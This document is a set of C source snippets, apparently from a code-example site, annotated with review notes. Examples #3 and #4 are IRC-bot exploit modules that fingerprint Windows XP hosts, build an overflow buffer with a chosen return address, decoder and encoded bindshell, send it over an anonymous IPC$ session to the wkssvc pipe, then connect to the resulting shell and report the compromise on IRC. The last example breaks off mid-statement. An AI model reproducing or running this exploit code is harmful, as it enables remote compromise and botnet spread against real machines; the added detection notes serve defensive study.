Example #1
/**
 * Write one DCE/RPC request fragment to hPipe, then recurse for the rest of the stub data.
 *
 * The header is passed by value, so the PFC flag bits and the length fields are adjusted
 * on a private copy: bit 0x01 marks the first fragment, bit 0x02 the last one. A fragment
 * is the serialised header followed by as much of pStubData as fits into nMaxSize.
 *
 * @param hPipe          open named-pipe handle, written with WriteFile.
 * @param pPacketHeader  request header template (copied; the caller's copy is untouched).
 * @param pStubData      remaining stub data; must hold at least nDataLen bytes.
 * @param nDataLen       bytes of stub data still to send.
 * @param nMaxSize       upper bound for one fragment, header included.
 * @param bFirst         true for the first fragment of a call only.
 * @return true once every fragment has been written, false on malloc or WriteFile failure.
 *
 * NOTE(review): nBytesWritten is filled in but never compared with fraglength, so a short
 * write is reported as success (the variant in Example #2 below checks it).
 * NOTE(review): the unsigned arithmetic assumes nMaxSize >= sizeof( RPC_ReqNorm ); the
 * callers on this page pass 4280, so the wrap-around is not reached here.
 */
BOOL SendReqPacket_Part(HANDLE hPipe, RPC_ReqNorm pPacketHeader, unsigned char *pStubData, unsigned long nDataLen, unsigned long nMaxSize, bool bFirst)
{
	bool bSendNext;
	unsigned char *pPacket;
	unsigned long nBytesWritten;

	// first-fragment bit: set on the initial call, cleared on every recursive call
	if( bFirst )
		pPacketHeader.NormalHeader.flags |= 1; // first fragment
	else
		pPacketHeader.NormalHeader.flags &= ~1; // not first fragment

	if( ( nDataLen + sizeof( RPC_ReqNorm ) ) <= nMaxSize )
	{
		// everything left fits into one fragment, so this is also the last one
		pPacketHeader.NormalHeader.fraglength	= (unsigned short)( nDataLen + sizeof( RPC_ReqNorm ) );
		pPacketHeader.allochint					= nDataLen;
		pPacketHeader.NormalHeader.flags		|= 2; // last fragment

		bSendNext = false;
	}
	else
	{
		// fill the fragment up to nMaxSize; allochint doubles as "stub bytes carried in this fragment"
		pPacketHeader.NormalHeader.fraglength	= (unsigned short)nMaxSize;
		pPacketHeader.allochint					= nMaxSize - sizeof( RPC_ReqNorm );
		pPacketHeader.NormalHeader.flags		&= ~2; // not last fragment

		bSendNext = true;
	}

	// one heap buffer per fragment, sized exactly to fraglength
	pPacket = (unsigned char*)malloc( pPacketHeader.NormalHeader.fraglength );
	if( !pPacket )
		return false;

	// serialise: header first, then allochint bytes of stub data directly behind it
	*(RPC_ReqNorm*)pPacket = pPacketHeader; // copy header
	memcpy( &pPacket[ sizeof( RPC_ReqNorm ) ], pStubData, pPacketHeader.allochint ); // add stub data

	// blocking write of the whole fragment; a partial write is not detected here
	if( !WriteFile( hPipe, pPacket, pPacketHeader.NormalHeader.fraglength, &nBytesWritten, NULL ) )
	{
		free( pPacket );
		return false;
	}
	free( pPacket );

	// tail call for the remainder: skip the allochint bytes just sent, never "first" again
	if( bSendNext )
		return SendReqPacket_Part( hPipe, pPacketHeader, &pStubData[ pPacketHeader.allochint ], nDataLen - pPacketHeader.allochint, nMaxSize, false );
	else
		return true;
}
Example #2
/**
 * Write one DCE/RPC request fragment to hPipe, then recurse for the rest of the stub data.
 *
 * Same contract as the variant in Example #1: the header copy gets the first-fragment
 * bit (0x01) and last-fragment bit (0x02) set or cleared, fraglength/allochint describe
 * this fragment, and the stub data is cut at nMaxSize. This version uses size_t/UINT16/
 * DWORD types and additionally treats a short WriteFile as a failure.
 *
 * @param hPipe          open named-pipe handle, written with WriteFile.
 * @param pPacketHeader  request header template (copied; the caller's copy is untouched).
 * @param pStubData      remaining stub data; must hold at least nDataLen bytes.
 * @param nDataLen       bytes of stub data still to send.
 * @param nMaxSize       upper bound for one fragment, header included.
 * @param bFirst         true for the first fragment of a call only.
 * @return true once every fragment has been fully written, false on malloc failure,
 *         WriteFile failure or a short write.
 *
 * NOTE(review): as in Example #1, nMaxSize < sizeof( RPC_ReqNorm ) would wrap allochint;
 * not reachable with the 4280 / MAX_FRAG_SIZE values used on this page as far as shown.
 */
bool SendReqPacket_Part( HANDLE hPipe, RPC_ReqNorm pPacketHeader, unsigned char *pStubData, size_t nDataLen, UINT16 nMaxSize, bool bFirst )
{
	bool bSendNext;
	unsigned char *pPacket;
	DWORD nBytesWritten;
	// first-fragment bit: set on the initial call, cleared on every recursive call
	if( bFirst )
		pPacketHeader.NormalHeader.flags |= 1;
	else
		pPacketHeader.NormalHeader.flags &= ~1;
	if( ( nDataLen + sizeof( RPC_ReqNorm ) ) <= nMaxSize )
	{
		// remaining data fits: last fragment, carries all nDataLen bytes
		pPacketHeader.NormalHeader.fraglength	= (UINT16)( nDataLen + sizeof( RPC_ReqNorm ) );
		pPacketHeader.allochint					= (UINT32)nDataLen;
		pPacketHeader.NormalHeader.flags		|= 2;
		bSendNext = false;
	}
	else
	{
		// full-size fragment; allochint = stub bytes carried in this fragment
		pPacketHeader.NormalHeader.fraglength	= (UINT16)nMaxSize;
		pPacketHeader.allochint					= nMaxSize - sizeof( RPC_ReqNorm );
		pPacketHeader.NormalHeader.flags		&= ~2;
		bSendNext = true;
	}
	// one heap buffer per fragment, sized exactly to fraglength
	pPacket = (unsigned char*)malloc( pPacketHeader.NormalHeader.fraglength );
	if( !pPacket )
		return false;
	// serialise header, then allochint bytes of stub data behind it
	*(RPC_ReqNorm*)pPacket = pPacketHeader;
	memcpy( &pPacket[ sizeof( RPC_ReqNorm ) ], pStubData, pPacketHeader.allochint );
	// a short write counts as a failure here (unlike Example #1)
	if( !WriteFile( hPipe, pPacket, pPacketHeader.NormalHeader.fraglength, &nBytesWritten, NULL ) ||
		nBytesWritten != pPacketHeader.NormalHeader.fraglength )
	{
		free( pPacket );
		return false;
	}
	free( pPacket );
	// tail call for the remainder, advanced past the bytes just sent
	if( bSendNext )
		return SendReqPacket_Part( hPipe, pPacketHeader, pStubData + pPacketHeader.allochint, nDataLen - pPacketHeader.allochint, nMaxSize, false );
	else
		return true;
}
Example #3
//BOOL ScriptGod_WKSSVC(unsigned long nTargetID,EXINFO exinfo,char *target, void* conn)
/**
 * Send a crafted Workstation-service (wkssvc) RPC request to exinfo.ip over SMB and,
 * if a shell answers on bindport afterwards, report the host on IRC.
 *
 * What the routine does, in order: fingerprint the host and bail out unless it looks
 * like Windows XP; patch the listening port into the bindshell blob and run it through
 * Encode(); build a 3500-byte, 'A'-filled, 0-terminated string that carries a
 * Targets[]-supplied EIP value at a Targets[]-supplied offset followed by the szStack,
 * szDecoder and encoded-shell blobs (their contents are defined elsewhere); open an
 * anonymous ("", "") session to \\host\ipc$; open \\host\pipe\wkssvc write-only; send
 * an RPC bind; send that string as the name argument of NetrAddAlternateComputerName
 * (opnum 27) or NetrValidateName2 (opnum 25); sleep 5 s and call ConnectShell().
 *
 * @param nTargetID  index into Targets[] (EIP offset/value and opnum choice).
 * @param exinfo     scan context: ip, exploit index, silent/verbose flags.
 * @param target     IRC destination of the status messages.
 * @param conn       IRC* connection, passed through a void*.
 * @return FALSE when the host is not fingerprinted as XP or a transport step fails;
 *         TRUE once the request was sent, whether or not a shell connected.
 *
 * Detection notes, all visible in this routine: an anonymous IPC$ session followed by
 * an open of \pipe\wkssvc; an RPC bind to 6bffd098-a112-3610-9833-46c3f87e345a v1
 * (the UUID bytes at Interface1 below); a request for opnum 25 or 27 whose string
 * argument is roughly 7000 bytes and arrives in 4280-byte fragments; a connection to
 * bindport on the host about 5 s later (ConnectShell(), defined elsewhere).
 */
BOOL sgwkssvc(unsigned long nTargetID,EXINFO exinfo,char *target, void* conn)
{
	IRC* irc=(IRC*)conn;
	//irc->privmsg(target,"%s %s: Connected to IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
	
	BOOL success=FALSE;	// set TRUE on the only path that continues past the fingerprint check
	int TargetOS;
//	char szShellBuf[ 512 ];
	int iShellSize;

	// =============================
	char* pszTarget;
	// ---
	char szNetbiosTarget[ 8192 ];
	wchar_t wszNetbiosTarget[ 8192 ];
	// NOTE(review): sized for a 405-byte shellcode (2 output bytes per input byte plus NUL);
	// Encode()'s output size is not shown here, so a wbindsize above 405 would overrun this buffer
	unsigned char szShellcodeEncoded[ ( 405 * 2 ) + 1 ];
	unsigned char szExploitsData[ 3500 ];
	unsigned long nExploitsDataPos;
	wchar_t wszExploitsData[ sizeof( szExploitsData ) ];	// 3500 wide chars, one per byte of szExploitsData
	// ---
	char szIPC[ 8192 ];
	NETRESOURCE NetSource;	// NOTE(review): only initialised when pszTarget != ".", but read on every cleanup path
	// ---
	char szPipe[ 8192 ];
	HANDLE hPipe;
	// ---
	RPC_ReqBind BindPacket;
	unsigned long nBytesWritten;
	RPC_ReqNorm ReqNormalHeader;
	unsigned long nPacketSize;
	unsigned char* pPacket;
	unsigned long nPacketPos;
	// ============================

	// fingerprint: FP_PORT5K probe first, RPC probe as fallback; anything but XP is skipped
	TargetOS = FpHost(exinfo.ip, FP_PORT5K);
	if(TargetOS != OS_WINXP)
		TargetOS = FpHost(exinfo.ip, FP_RPC);

	if(TargetOS != OS_WINXP)
		return FALSE;
	else
		success=TRUE;
	
//	irc->privmsg(target,"%s %s: Target running XP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);

	// parameters
	pszTarget=exinfo.ip;

//	char URL[MAX_HOSTNAME];
//	char fname[_MAX_FNAME];
//	sprintf(fname,"eraseme_%d%d%d%d%d.exe",rand()%9,rand()%9,rand()%9,rand()%9,rand()%9);
//	_snprintf(URL,sizeof(URL),
//		"ftp://*****:*****@%s:%d/%s",
//		(PrivateIP(exinfo.ip)?inip:exip),FTP_PORT,fname);
	
	// patch the listen port into the bindshell blob at byte offset 176; the XOR with 0x9999
	// is presumably undone inside the blob itself (not visible on this page)
	unsigned short port;
    port = fhtons(bindport)^(USHORT)0x9999;
    memcpy(&bindshell[176],&port,2);
    
	iShellSize=wbindsize;//setup_shellcode_udtf(szShellBuf, sizeof(szShellBuf), URL, false, NULL);
	if (!iShellSize)
		return FALSE;

	// get shellcode
	//iShellSize = GetRNS0TerminatedShellcode( szShellBuf, sizeof( szShellBuf ), GetIP( exinfo.sock ), filename );
	//if( !iShellSize )
	//	return FALSE;

	// generate exploits buffer
	// ========================
	ZeroMemory(szShellcodeEncoded, sizeof(szShellcodeEncoded));
	ZeroMemory(szExploitsData, sizeof(szExploitsData));
	ZeroMemory(wszExploitsData, sizeof(wszExploitsData));

	// fill with 'A' (0x41, "inc ecx") rather than 0x90 so the buffer stays a valid 0-terminated string
	memset(szExploitsData,'A',sizeof(szExploitsData)-1);

	// new EIP: the 4-byte value from Targets[] stored at the Targets[] offset
	// NOTE(review): unaligned write through an unsigned long* into a char array; UB in ISO C, relies on MSVC/x86
	*(unsigned long*)(&szExploitsData[Targets[nTargetID].nNewEIP_BufferOffset]) = Targets[nTargetID].nNewEIP;

	// the first 2300 bytes stay 'A'; the blobs start here
	nExploitsDataPos = 2300;

	// add stack (blob defined elsewhere; sizeof - 1 drops the string terminator)
	memcpy( &szExploitsData[ nExploitsDataPos ], szStack, sizeof( szStack ) - 1 );
	nExploitsDataPos += sizeof( szStack ) - 1;

	// add decoder (blob defined elsewhere)
	memcpy( &szExploitsData[ nExploitsDataPos ], szDecoder, sizeof( szDecoder ) - 1 );
	nExploitsDataPos += sizeof( szDecoder ) - 1;

	// add shellcode
	// - bind port: already patched into bindshell above
	// - encode
	Encode( (unsigned char*)bindshell, iShellSize, szShellcodeEncoded );
	// - add: the encoded output is treated as a C string, so it is assumed to contain no 0x00
	memcpy( &szExploitsData[ nExploitsDataPos ], szShellcodeEncoded, strlen( (char*)szShellcodeEncoded ) );
	nExploitsDataPos += strlen( (char*)szShellcodeEncoded );
	// - 0-terminate for the decoder
	szExploitsData[ nExploitsDataPos ] = 0;
	nExploitsDataPos += 1;

	// convert to UNICODE
	// ==================
	// byte-wise widening (unsigned char -> wchar_t, zero-extended), not a code-page conversion;
	// NOTE(review): n is int, sizeof() is size_t, so this is a signed/unsigned comparison
	for( int n = 0; n < sizeof( szExploitsData ); n++ )
		wszExploitsData[ n ] = szExploitsData[ n ];
	//MultiByteToWideChar( CP_ACP, 0, (char*)szExploitsData, -1, wszExploitsData, sizeof( wszExploitsData ) / sizeof( wchar_t ) );
	_snprintf(szNetbiosTarget,sizeof(szNetbiosTarget), "\\\\%s", pszTarget);	// "\\host"
	mbstowcs(wszNetbiosTarget,szNetbiosTarget, sizeof(wszNetbiosTarget)/sizeof(wchar_t));
	
	// create NULL session
	// ===================
	// anonymous ("" user, "" password) connection to \\host\ipc$ unless the target is the local machine (".")
	if( strcmpi( pszTarget, "." ) )
	{
		//_snprintf(szIPC,sizeof(szIPC), "\\\\%s\\", pszTarget);
		_snprintf(szIPC,sizeof(szIPC),"\\\\%s\\",pszTarget);
		// NOTE(review): strncat's count is the space left in dst, not sizeof( dst ); harmless with
		// this short literal, but it is the classic misuse (Example #4 builds the path with one snprintf)
		strncat(szIPC,"ipc$",sizeof(szIPC));
		ZeroMemory(&NetSource,sizeof(NetSource));
		NetSource.lpRemoteName = szIPC;
		fWNetAddConnection2(&NetSource,"","",0);	// result ignored: a refused session is not detected here
	}
	// ===================

	// connect to pipe
	// ===============
	// \\host\pipe\wkssvc is opened write-only: nothing is ever read back from the service
	//_snprintf(szPipe,sizeof(szPipe),"\\\\%s\\pipe\\wkssvc",pszTarget);
	_snprintf(szPipe,sizeof(szPipe),"\\\\%s\\",pszTarget);
	strncat(szPipe,"pipe\\wkssvc",sizeof(szPipe));	// same strncat count issue as above
	hPipe = CreateFile(szPipe, GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);
	if(hPipe == INVALID_HANDLE_VALUE)
	{
		// NOTE(review): NetSource.lpRemoteName is uninitialised here when pszTarget was "."
		fWNetCancelConnection2(NetSource.lpRemoteName, 0, FALSE);
		return FALSE;
	}
	// ===============

	// bind packet
	// ===========
	ZeroMemory(&BindPacket,sizeof(BindPacket));
	BindPacket.NormalHeader.versionmaj		= 5;
	BindPacket.NormalHeader.versionmin		= 0;
	BindPacket.NormalHeader.type			= 11;	// bind
	BindPacket.NormalHeader.flags			= 3;	// first + last fragment
	BindPacket.NormalHeader.representation	= 0x00000010; // little endian
	BindPacket.NormalHeader.fraglength		= sizeof(BindPacket);
	BindPacket.NormalHeader.authlength		= 0;
	BindPacket.NormalHeader.callid			= 1;
	BindPacket.maxtsize						= 4280;	// the same 4280 is the fragment size handed to SendReqPacket_Part below
	BindPacket.maxrsize						= 4280;
	BindPacket.assocgid						= 0;
	BindPacket.numelements					= 1;
	BindPacket.contextid					= 0;
	BindPacket.numsyntaxes					= 1;
	BindPacket.Interface1.version			= 1;
	// abstract syntax: wkssvc, 6bffd098-a112-3610-9833-46c3f87e345a (bytes in little-endian GUID order)
	memcpy(BindPacket.Interface1.byte, "\x98\xd0\xff\x6b\x12\xa1\x10\x36\x98\x33\x46\xc3\xf8\x7e\x34\x5a", 16);
	BindPacket.Interface2.version			= 2;
	// transfer syntax: NDR, 8a885d04-1ceb-11c9-9fe8-08002b104860
	memcpy(BindPacket.Interface2.byte, "\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00\x2b\x10\x48\x60", 16);

	// send
	// the bind_ack is never read (the pipe is write-only), so a rejected bind goes unnoticed
	if(!WriteFile(hPipe, &BindPacket, sizeof( RPC_ReqBind ), &nBytesWritten, NULL))
	{
		//irc->privmsg(target,"%s %s: !WriteFile: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
		CloseHandle(hPipe);
		fWNetCancelConnection2(NetSource.lpRemoteName, 0, FALSE);
		return FALSE;
	}
	// ===========

	// request
	// =======
	// generate packet
	// ---------------

	// calc packet size: must mirror the "build packet" steps below step for step
	nPacketSize = 0;
	nPacketSize += sizeof( szWKSSVCUnknown1 ) - 1;
	nPacketSize += sizeof( UNISTR2 );
	nPacketSize += ( wcslen( wszNetbiosTarget ) + 1 ) * sizeof( wchar_t );
	while(nPacketSize % 4)	// NDR 4-byte alignment
		nPacketSize++;
	if(Targets[nTargetID].bCanUse_NetAddAlternateComputerName)
		nPacketSize += sizeof( szWKSSVCUnknown2 ) - 1;
	nPacketSize += sizeof( UNISTR2 ); 
	nPacketSize += ( wcslen( wszExploitsData ) + 1 ) * sizeof( wchar_t );
	while( nPacketSize % 4 )
		nPacketSize++;
	nPacketSize += 8; // szWSSKVCUnknown3
	if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName )
		nPacketSize += 4; // NetAddAlternateComputerName = reserved
	else
		nPacketSize += 2; // NetValidateName = NameType

	// alloc packet
	pPacket = (unsigned char*)malloc( nPacketSize );
	if( !pPacket )
	{
		//irc->privmsg(target,"%s %s: !malloc: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
		CloseHandle( hPipe );
		fWNetCancelConnection2( NetSource.lpRemoteName, 0, FALSE );
		return FALSE;
	}
	ZeroMemory(pPacket,nPacketSize);

	// build packet
	nPacketPos = 0;

	// - szWKSSVCUnknown1 (blob defined elsewhere)
	memcpy( &pPacket[ nPacketPos ], szWKSSVCUnknown1, sizeof( szWKSSVCUnknown1 ) - 1 );
	nPacketPos += sizeof( szWKSSVCUnknown1 ) - 1;

	// - wszNetbiosTarget as a counted UNICODE string: length/maxlength in wide chars, terminator included
	( (UNISTR2*)&pPacket[ nPacketPos ] )->length	= wcslen( wszNetbiosTarget ) + 1;
	( (UNISTR2*)&pPacket[ nPacketPos ] )->unknown	= 0;
	( (UNISTR2*)&pPacket[ nPacketPos ] )->maxlength	= ( (UNISTR2*)&pPacket[ nPacketPos ] )->length;
	nPacketPos += sizeof( UNISTR2 );

	wcscpy( (wchar_t*)&pPacket[ nPacketPos ], wszNetbiosTarget );
	nPacketPos += ( wcslen( wszNetbiosTarget ) + 1 ) * sizeof( wchar_t );

	// - align to 4 bytes
	while( nPacketPos % 4 )
		nPacketPos++;

	// - szWKSSVCUnknown2 (only for the opnum-27 variant)
	if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName )
	{
		memcpy( &pPacket[ nPacketPos ], szWKSSVCUnknown2, sizeof( szWKSSVCUnknown2 ) - 1 );
		nPacketPos += sizeof( szWKSSVCUnknown2 ) - 1;
	}

	// - wszExploitsData: the oversized name argument, same counted-string framing as above
	( (UNISTR2*)&pPacket[ nPacketPos ] )->length	= wcslen( wszExploitsData ) + 1;
	( (UNISTR2*)&pPacket[ nPacketPos ] )->unknown	= 0;
	( (UNISTR2*)&pPacket[ nPacketPos ] )->maxlength	= ( (UNISTR2*)&pPacket[ nPacketPos ] )->length;
	nPacketPos += sizeof( UNISTR2 );

	wcscpy( (wchar_t*)&pPacket[ nPacketPos ], wszExploitsData );
	nPacketPos += ( wcslen( wszExploitsData ) + 1 ) * sizeof( wchar_t );

	// - align to 4 bytes
	while( nPacketPos % 4 )
		nPacketPos++;

	// - szWSSKVCUnknown3 (only eight 0x00s)
	ZeroMemory(&pPacket[nPacketPos],8);
	nPacketPos += 8;

	if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName )
	{
		// NetAddAlternateComputerName: Reserved = 0 (DWORD)
		*(DWORD*)&pPacket[ nPacketPos ] = 0;
		nPacketPos += sizeof( DWORD );
	}
	else
	{
		// NetValidateName: NameType = NetSetupMachine (1), 16-bit
		*(unsigned short*)&pPacket[ nPacketPos ] = 1;
		nPacketPos += 2;
	}

	// header
	ZeroMemory(&ReqNormalHeader,sizeof(ReqNormalHeader));
	ReqNormalHeader.NormalHeader.versionmaj		= 5;
	ReqNormalHeader.NormalHeader.versionmin		= 0;
	ReqNormalHeader.NormalHeader.type			= 0;	// request
	ReqNormalHeader.NormalHeader.flags			= 3;	// first + last fragment; rewritten per fragment by SendReqPacket_Part
	ReqNormalHeader.NormalHeader.representation	= 0x00000010; // little endian
	ReqNormalHeader.NormalHeader.authlength		= 0;
	ReqNormalHeader.NormalHeader.callid			= 1;
	ReqNormalHeader.prescontext					= 0;
	if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName )
		ReqNormalHeader.opnum					= 27;	// NetrAddAlternateComputerName
	else
		ReqNormalHeader.opnum					= 25;	// NetrValidateName2
	// send
	// fragmented at 4280 bytes (the bind's maxtsize); nPacketSize, not nPacketPos, is the length sent
	if( !SendReqPacket_Part( hPipe, ReqNormalHeader, pPacket, nPacketSize, 4280, true ) )
	{
		//irc->privmsg(target,"%s %s: !SendReqPacket_Part: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
		CloseHandle( hPipe );
		free( pPacket );
		fWNetCancelConnection2( NetSource.lpRemoteName, 0, FALSE );
		return FALSE;
	}
	// =======
	
	// clean up
	// =================
	CloseHandle( hPipe );
	free( pPacket );
	fWNetCancelConnection2( NetSource.lpRemoteName, 0, FALSE );

	// success is always TRUE at this point (see the fingerprint check above)
	if (success)
	{
		// wait 5 s, then try the listener on bindport; the outcome is only reported on IRC, not returned
		Sleep(5000);
		if (ConnectShell(exinfo,bindport))
		{
			if (!exinfo.silent)
				irc->privmsg(target,"%s %s: Exploiting IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
			exploit[exinfo.exploit].stats++;
		}
		else
			if (!exinfo.silent && exinfo.verbose)
				irc->privmsg(target,"%s %s: Failed to exploit IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
	}
	return TRUE;
}
Example #4
/**
 * Sibling of sgwkssvc() above: same XP fingerprint gate, same 3500-byte string
 * construction, same anonymous IPC$ session, \pipe\wkssvc open, RPC bind and opnum 25/27
 * request. Differences: the shellcode comes from GetRNS0TerminatedShellcode( ..., GetIP(
 * exinfo.sock ), filename ) (what it produces is not shown here) instead of the patched
 * bindshell blob; paths are built with single snprintf calls; and the result is reported
 * with irc_privmsg()/addlog() without attempting a connection back to the host.
 *
 * @param nTargetID  index into Targets[] (EIP offset/value and opnum choice).
 * @param exinfo     scan context: ip, sock, chan, notice, exploit index.
 * @return FALSE when the host is not fingerprinted as XP or a transport step fails;
 *         TRUE once the request was sent (the stats counter is bumped unconditionally).
 *
 * NOTE(review): the message buffer at the end is never written (the _snprintf that filled
 * it is commented out), so irc_privmsg() and addlog() emit uninitialised stack bytes.
 * NOTE(review): NetSource is only initialised when pszTarget != ".", but its lpRemoteName
 * is passed to fWNetCancelConnection2 on every cleanup path.
 * Detection notes are those of sgwkssvc(): anonymous IPC$ session, open of \pipe\wkssvc,
 * bind to 6bffd098-a112-3610-9833-46c3f87e345a v1, opnum 25/27 with a roughly 7000-byte
 * string argument delivered in 4280-byte fragments.
 */
BOOL ScriptGod_WKSSVC( unsigned long nTargetID, EXINFO exinfo )
{
	int TargetOS;
	char szShellBuf[ 512 ];
	int iShellSize;

	// =============================
	char* pszTarget;
	// ---
	char szNetbiosTarget[ 8192 ];
	wchar_t wszNetbiosTarget[ 8192 ];
	// two output bytes per shellcode byte plus NUL; assumes Encode() never expands further (not shown here)
	unsigned char szShellcodeEncoded[ ( sizeof( szShellBuf ) * 2 ) + 1 ];
	unsigned char szExploitsData[ 3500 ];
	unsigned long nExploitsDataPos;
	wchar_t wszExploitsData[ sizeof( szExploitsData ) ];	// 3500 wide chars, one per byte of szExploitsData
	// ---
	char szIPC[ 8192 ];
	NETRESOURCE NetSource;
	// ---
	char szPipe[ 8192 ];
	HANDLE hPipe;
	// ---
	RPC_ReqBind BindPacket;
	unsigned long nBytesWritten;
	RPC_ReqNorm ReqNormalHeader;
	unsigned long nPacketSize;
	unsigned char* pPacket;
	unsigned long nPacketPos;
	// ============================

	// check if xp: single RPC fingerprint probe, anything else is skipped
	TargetOS = FpHost( exinfo.ip, FP_RPC );
	if( TargetOS != OS_WINXP )
		return FALSE;

	// parameters
	pszTarget = exinfo.ip;

	// get shellcode (generator defined elsewhere; 0 length means "nothing to send")
	iShellSize = GetRNS0TerminatedShellcode( szShellBuf, sizeof( szShellBuf ), GetIP( exinfo.sock ), filename );
	if( !iShellSize )
		return FALSE;

	// generate exploits buffer
	// ========================
	memset( szShellcodeEncoded, 0, sizeof( szShellcodeEncoded ) );
	memset( szExploitsData, 0, sizeof( szExploitsData ) );
	memset( wszExploitsData, 0, sizeof( wszExploitsData ) );

	// fill with 'A' (0x41, "inc ecx") rather than 0x90 so the buffer stays a valid 0-terminated string
	memset( szExploitsData, 'A', sizeof( szExploitsData ) - 1 );

	// new EIP: the 4-byte value from Targets[] stored at the Targets[] offset
	// NOTE(review): unaligned write through an unsigned long* into a char array; UB in ISO C, relies on MSVC/x86
	*(unsigned long*)( &szExploitsData[ Targets[ nTargetID ].nNewEIP_BufferOffset ] ) = Targets[ nTargetID ].nNewEIP;

	// the first 2300 bytes stay 'A'; the blobs start here
	nExploitsDataPos = 2300;

	// add stack (blob defined elsewhere; sizeof - 1 drops the string terminator)
	memcpy( &szExploitsData[ nExploitsDataPos ], szStack, sizeof( szStack ) - 1 );
	nExploitsDataPos += sizeof( szStack ) - 1;

	// add decoder (blob defined elsewhere)
	memcpy( &szExploitsData[ nExploitsDataPos ], szDecoder, sizeof( szDecoder ) - 1 );
	nExploitsDataPos += sizeof( szDecoder ) - 1;

	// add shellcode
	// - bind port: not patched in this variant
	// - encode
	Encode( (unsigned char*)szShellBuf, iShellSize, szShellcodeEncoded );
	// - add: the encoded output is treated as a C string, so it is assumed to contain no 0x00
	memcpy( &szExploitsData[ nExploitsDataPos ], szShellcodeEncoded, strlen( (char*)szShellcodeEncoded ) );
	nExploitsDataPos += strlen( (char*)szShellcodeEncoded );
	// - 0-terminate for the decoder
	szExploitsData[ nExploitsDataPos ] = 0;
	nExploitsDataPos += 1;

	// convert to UNICODE
	// ==================
	// byte-wise widening (unsigned char -> wchar_t, zero-extended), not a code-page conversion;
	// NOTE(review): n is int, sizeof() is size_t, so this is a signed/unsigned comparison
	for( int n = 0; n < sizeof( szExploitsData ); n++ )
		wszExploitsData[ n ] = szExploitsData[ n ];
	//MultiByteToWideChar( CP_ACP, 0, (char*)szExploitsData, -1, wszExploitsData, sizeof( wszExploitsData ) / sizeof( wchar_t ) );
	snprintf( szNetbiosTarget, sizeof( szNetbiosTarget ), "\\\\%s", pszTarget );	// "\\host"
	mbstowcs( wszNetbiosTarget, szNetbiosTarget, sizeof( wszNetbiosTarget ) / sizeof( wchar_t ) );
	
	// create NULL session
	// ===================
	// anonymous ("" user, "" password) connection to \\host\ipc$ unless the target is the local machine (".")
	if( strcmpi( pszTarget, "." ) )
	{
		snprintf( szIPC, sizeof( szIPC ), "\\\\%s\\ipc$", pszTarget );
		memset( &NetSource, 0 ,sizeof( NetSource ) );
		NetSource.lpRemoteName = szIPC;
		fWNetAddConnection2( &NetSource, "", "", 0 );	// result ignored: a refused session is not detected here
	}
	// ===================

	// connect to pipe
	// ===============
	// \\host\pipe\wkssvc is opened write-only: nothing is ever read back from the service
	snprintf( szPipe, sizeof( szPipe ), "\\\\%s\\pipe\\wkssvc", pszTarget );
	hPipe = CreateFile( szPipe, GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL );
	if( hPipe == INVALID_HANDLE_VALUE )
	{
		// NOTE(review): NetSource.lpRemoteName is uninitialised here when pszTarget was "."
		fWNetCancelConnection2( NetSource.lpRemoteName, 0, FALSE );
		return FALSE;
	}
	// ===============

	// bind packet
	// ===========
	memset( &BindPacket, 0, sizeof( BindPacket ) );
	BindPacket.NormalHeader.versionmaj		= 5;
	BindPacket.NormalHeader.versionmin		= 0;
	BindPacket.NormalHeader.type			= 11;	// bind
	BindPacket.NormalHeader.flags			= 3;	// first + last fragment
	BindPacket.NormalHeader.representation	= 0x00000010; // little endian
	BindPacket.NormalHeader.fraglength		= sizeof( BindPacket );
	BindPacket.NormalHeader.authlength		= 0;
	BindPacket.NormalHeader.callid			= 1;
	BindPacket.maxtsize						= 4280;	// the same 4280 is the fragment size handed to SendReqPacket_Part below
	BindPacket.maxrsize						= 4280;
	BindPacket.assocgid						= 0;
	BindPacket.numelements					= 1;
	BindPacket.contextid					= 0;
	BindPacket.numsyntaxes					= 1;
	BindPacket.Interface1.version			= 1;
	// abstract syntax: wkssvc, 6bffd098-a112-3610-9833-46c3f87e345a (bytes in little-endian GUID order)
	memcpy( BindPacket.Interface1.byte, "\x98\xd0\xff\x6b\x12\xa1\x10\x36\x98\x33\x46\xc3\xf8\x7e\x34\x5a", 16 );
	BindPacket.Interface2.version			= 2;
	// transfer syntax: NDR, 8a885d04-1ceb-11c9-9fe8-08002b104860
	memcpy( BindPacket.Interface2.byte, "\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00\x2b\x10\x48\x60", 16 );

	// send
	// the bind_ack is never read (the pipe is write-only), so a rejected bind goes unnoticed
	if( !WriteFile( hPipe, &BindPacket, sizeof( RPC_ReqBind ), &nBytesWritten, NULL ) )
	{
		CloseHandle( hPipe );
		fWNetCancelConnection2( NetSource.lpRemoteName, 0, FALSE );
		return FALSE;
	}
	// ===========

	// request
	// =======
	// generate packet
	// ---------------

	// calc packet size: must mirror the "build packet" steps below step for step
	nPacketSize = 0;
	nPacketSize += sizeof( szWKSSVCUnknown1 ) - 1;
	nPacketSize += sizeof( UNISTR2 );
	nPacketSize += ( wcslen( wszNetbiosTarget ) + 1 ) * sizeof( wchar_t );
	while( nPacketSize % 4 )	// NDR 4-byte alignment
		nPacketSize++;
	if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName )
		nPacketSize += sizeof( szWKSSVCUnknown2 ) - 1;
	nPacketSize += sizeof( UNISTR2 ); 
	nPacketSize += ( wcslen( wszExploitsData ) + 1 ) * sizeof( wchar_t );
	while( nPacketSize % 4 )
		nPacketSize++;
	nPacketSize += 8; // szWSSKVCUnknown3
	if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName )
		nPacketSize += 4; // NetAddAlternateComputerName = reserved
	else
